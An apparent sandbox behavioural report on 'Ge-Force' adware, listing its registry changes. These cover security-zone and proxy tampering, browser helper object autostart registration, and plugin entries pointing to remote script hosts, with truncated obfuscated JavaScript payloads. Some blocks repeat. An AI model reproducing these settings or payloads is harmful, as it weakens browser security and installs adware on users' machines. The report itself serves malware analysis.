[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 3B B8 98 C0 3E 1C 13 AA 25 7E 13 60 E7 DA C3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Ge-Force-codedownloader.exe:2564 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 8A EA 02 46 B1 54 1E 18 F1 0E CA 5C 93 93 E3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2416 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ge-Force"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}]
"(Default)" = "ISandBox"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
"(Default)" = "Ge-Force"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129 Type Library"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"Version" = "1.0"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\0\win32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 CF F8 5D EB 30 6B 3C 3D 18 05 8A 10 0B BE F6"
[HKCR\Interface\{55555555-5555-5555-5555-550655915529}]
"(Default)" = "ICrossriderBHO"
[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
"(Default)" = ""
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
"NoExplorer" = "1"
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"
The Worm deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
The process Khtmovq.exe:664 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Ge-Force\Plugins\192]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/192.js"
[HKCU\Software\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"
[HKCU\Software\Ge-Force\Plugins\17]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/17.js"
[HKCU\Software\Ge-Force\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\Ge-Force\Plugins\22]
"Name" = "resources"
[HKCU\Software\Ge-Force\Plugins\39]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'
[HKCU\Software\Ge-Force\Plugins\301]
"Version" = "2"
[HKCU\Software\Ge-Force\Plugins\262]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/262.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Ge-Force\Manifest]
"PublisherId" = "21836"
[HKCU\Software\Ge-Force\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\Ge-Force\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\Ge-Force\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\Ge-Force\Plugins\242]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Ge-Force\Plugins\72]
"Version" = "5"
[HKCU\Software\Ge-Force\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Ge-Force\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\Ge-Force\Plugins\337]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:TEN}))();};"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Ge-Force\Plugins\288]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/288.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Ge-Force\Plugins\7]
"Name" = "hooks"
[HKCU\Software\Ge-Force\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\Ge-Force\Plugins\14]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/14.js"
[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferUrl" = "NA"
"DisableIe" = "true"
[HKCU\Software\Ge-Force\Plugins\246]
"JavaScript" = "var _0x6ef5=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\Ge-Force\Installer]
"DefaultBrowser" = "ie"
[HKCU\Software\Ge-Force\Plugins\337]
"Name" = "icm_ten_m"
[HKCU\Software\Ge-Force\Plugins\39]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/39.js"
[HKCU\Software\Ge-Force\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"
[HKCU\Software\Ge-Force\Plugins\301]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ODU2NTg0YjU2NDgwNDFmMDAxZjM3MDQxNDQ5NGM0YTRlMDMwMDFiMTI0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU1ZDE5NWEwYzBlMTkwZDBmMTAxODAzMDUwMDQxMGMxMzBjNDQxNzFhMWM0NDE4NDEwODA1NDcwODI3MmI1MTBkMTUwMzExMTM1ZTA4MTcwNzFjMGExZDA4MGMzZjFjNTYyOTM1MmYzOTNiM2MzMTI0MzEyZjMzMzgzMzI4MzUyMjMyMjkzMTJmMjkzNTRhMDgxYjFhMGMwMjBhMTIzNTA1MDgwZTQ5MzAzZDM1MmEyNDI1MzkzZTIyMzAyYTMwMjkzYjI0MjMyNDM4MzkyZDMwMjEzOTNjMmUyOTM1NGEwOTA2MDAxNTA1MWQxOTM1MDUwODBlNDkzMDNkMzUyYTI0MjUzOTNlMjIzMDJhMzAyOTNhMzkzOTNkM2YyZTI2MzAzZDUwMTkxYjA2MjMyODU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTIzMjgzNDJiNDkwMzA2MDgyNTE3MDcwOTU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTI0MmQyNjMxMzAzZDUwMzEyOTNmMjk1MTM0MmIyYzMwMzkyYjM4MjQyMzI4MmUyNjMwMmIzODJiM2YzNzI2MjAyZTI2MzAzNzI1M2QzOTI5MjMyODM0MmI0OTExMDMxYTIyMzI1NzMzMzQzNzNkMmQyNTJiMzkzZjJlMjkzOTJiMmEzYTIyM2QyNTMyMmYyODM0MjczYTIwMjkzMTJmMjkzNTRhMTk0OTMwM2QyNDM2MmYyOTM1NGU0NzdlNGY0MjU2NTg0OTFlMWUxODFiMDczYTEwMWE1YTUxNTY0ODA0MWYwMDFmMTE0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU"
[HKLM\SOFTWARE\Ge-Force\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Ge-Force\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\Ge-Force\Plugins\246]
"Name" = "setup"
[HKCU\Software\Ge-Force\Installer]
"Time" = "1421039403"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"
[HKCU\Software\Ge-Force\Plugins\184]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/184.js"
[HKCU\Software\Ge-Force\Plugins\40]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/40.js"
[HKCU\Software\Ge-Force\Installer]
"AdditionalInfo" = "{""asw"":[0, 1073750528, -2147483648, 0],""browser_name"":""ie""
"StatsDomain" = "http://stats.newstatsclientcloud.com"
[HKCU\Software\Ge-Force\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\Ge-Force\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveI"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Ge-Force\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"
[HKCU\Software\Ge-Force\Plugins\350]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/350.js"
[HKCU\Software\Ge-Force\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Ge-Force\Plugins\21]
"Name" = "debug"
[HKCU\Software\Ge-Force\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Ge-Force\Plugins\45]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/45.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"
[HKCU\Software\Ge-Force\Plugins\38]
"Version" = "4"
[HKCU\Software\Ge-Force\Plugins\356]
"Name" = "icm_man_m"
[HKCU\Software\Ge-Force\Manifest]
"EnableSearchIE" = "false"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Ge-Force\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Ge-Force\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\InstalledBrowserExtensions\iWebar]
"69129" = "Ge-Force"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Ge-Force\Plugins\286]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Ge-Force\Plugins\28]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/28.js"
[HKCU\Software\Ge-Force\Plugins\354]
